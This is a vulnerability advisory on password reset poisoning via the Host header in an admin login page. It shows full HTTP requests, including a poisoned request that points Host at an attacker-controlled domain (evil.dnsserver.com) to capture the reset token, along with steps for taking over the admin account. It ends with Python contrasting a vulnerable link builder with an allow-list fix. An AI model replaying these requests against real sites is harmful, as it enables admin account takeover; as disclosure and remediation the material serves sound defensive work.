Summary:
Administrator Password Reset Poisoning by host header attack
Detailed Description:
The forgot-password function only needs the user name to generate a reset
password link and send it to the user's email. The following POST request is the
normal request.
POST /admin/login.php HTTP/1.1
Host: Host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/admin/login.php?forgotpw=1
Cookie: [removed]
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
forgottenusername=admin&forgotpwform=1&loginsubmit=Submit
This is a normal reset password link:
http://Host/admin/login.php?recoverme=b18c6cc54432d97a1a7f28c6103b5b58
But the host in the reset password link comes from the Host header of the
forgot-password POST request. This means that if the Host header of the request
is changed, the host in the reset password link changes with it.
So if the attacker knows the administrator's user name and changes the Host
header of the request, then when the admin clicks the link, the attacker learns
the recoverme token. For example:
1. The attacker changes the Host header of the request to a DNS name they control,
here evil.dnsserver.com:
POST /admin/login.php HTTP/1.1
Host: evil.dnsserver.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/admin/login.php?forgotpw=1
Cookie: [removed]
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
forgottenusername=admin&forgotpwform=1&loginsubmit=Submit
2. The admin then receives a password reset link like the following:
http://evil.dnsserver.com/admin/login.php?recoverme=b18c6cc54432d97a1a7f28c6103b5b58
3. When the admin clicks the reset password link, the request goes to the
attacker's host, so the attacker receives the value of recoverme. The attacker
can then build a valid reset password link with the true host and change the
admin's password.
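The root cause and the fix, as an added illustration (this is not the affected project's code): the hostnames, base URL and request below are constructed for the example. The vulnerable builder copies the request's Host header into the link; the hardened builder takes the host only from configuration and refuses requests whose Host header is not on the allow-list.

```python
"""Constructed example: building a password-reset link from an incoming request.
Not the code of the affected project; hostnames and config are hypothetical."""
from typing import Dict, Optional, Tuple
from urllib.parse import urlencode

# Hypothetical deployment config: the only hostnames this site is served under.
ALLOWED_HOSTS = {"www.example.test", "example.test"}
CANONICAL_BASE = "https://www.example.test"


def parse_request(raw: str) -> Tuple[Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (headers, body); header names lowercased."""
    head, _, body = raw.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def vulnerable_reset_link(headers: Dict[str, str], token: str) -> str:
    """Reproduces the reported defect: the link host is copied from the Host header."""
    return "http://%s/admin/login.php?recoverme=%s" % (headers["host"], token)


def host_is_trusted(headers: Dict[str, str]) -> bool:
    """True only if the Host header (port stripped, case-folded) is a configured hostname."""
    host = headers.get("host", "").split(":", 1)[0].lower()
    return host in ALLOWED_HOSTS


def safe_reset_link(headers: Dict[str, str], token: str) -> Optional[str]:
    """Build the link from the configured base URL only; refuse untrusted Host values."""
    if not host_is_trusted(headers):
        return None  # caller should answer 400 and log the offending Host value
    return "%s/admin/login.php?%s" % (CANONICAL_BASE, urlencode({"recoverme": token}))


# Constructed request mirroring the report, with the Host header pointed elsewhere.
POISONED_REQUEST = (
    "POST /admin/login.php HTTP/1.1\r\n"
    "Host: attacker.invalid\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 57\r\n"
    "\r\n"
    "forgottenusername=admin&forgotpwform=1&loginsubmit=Submit"
)
```

Running both builders over POISONED_REQUEST shows the vulnerable link pointing at attacker.invalid while the hardened version refuses the request; the same request with a configured hostname yields a link on the canonical base only.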